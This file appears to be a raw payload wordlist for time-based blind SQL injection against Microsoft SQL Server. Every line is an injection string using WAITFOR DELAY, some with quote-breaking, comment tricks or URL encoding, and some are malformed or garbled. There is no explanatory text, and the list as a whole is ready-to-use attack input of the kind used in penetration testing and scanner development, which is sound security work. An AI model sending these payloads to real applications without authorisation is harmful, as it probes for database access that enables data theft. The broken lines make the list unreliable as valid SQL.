0' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
0' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
0' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)/* OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- */
R(IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0))-- 
IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)' OR IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0)-- 
(IF((SELECT current_timestamp)=SYSDATETIME(), WAITFOR DELAY '00:00:05', 0) AND 5=5)-- 

WAITFOR DELAY '00:00:05'-- 
WAITFOR DELAY '00:00:05' OR ''=' OR WAITFOR DELAY '00:00:05'-- 
%2c(SELECT%35%5FROM%5(SELECT WAITFOR DELAY '00:00:05'))a 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))v 
(SELECT WAITFOR DELAY '00:00:05') 
'%2b(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))a)%2b' 
,(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))a 
DESC%2C(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))a 
-1' OR 1+1=3d((SELECT 1+FROM+(SELECT WAITFOR DELAY '00:00:05'))A) 
-1' OR 1=1+((SELECT 1+FROM+(SELECT WAITFOR DELAY '00:00:05'))A) 

(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))YYYY 
(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))YYYY# 
(SELECT * FROM (SELECT WAITFOR DELAY '00:00:05'))YYYY-- 
''+(SELECT (FROM (SELECT WAITFOR DELAY '00:00:05'))a)+'' 

(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))%2f'+ 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))+"" 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))+"" 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))%2f'+ 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))+"" 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))%2f 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))/*+ 
(SELECT 0 FROM (SELECT WAITFOR DELAY '00:00:05'))*/ 
'',)+/test/%26%26%09WAITFOR DELAY '00:00:05'%09-- 
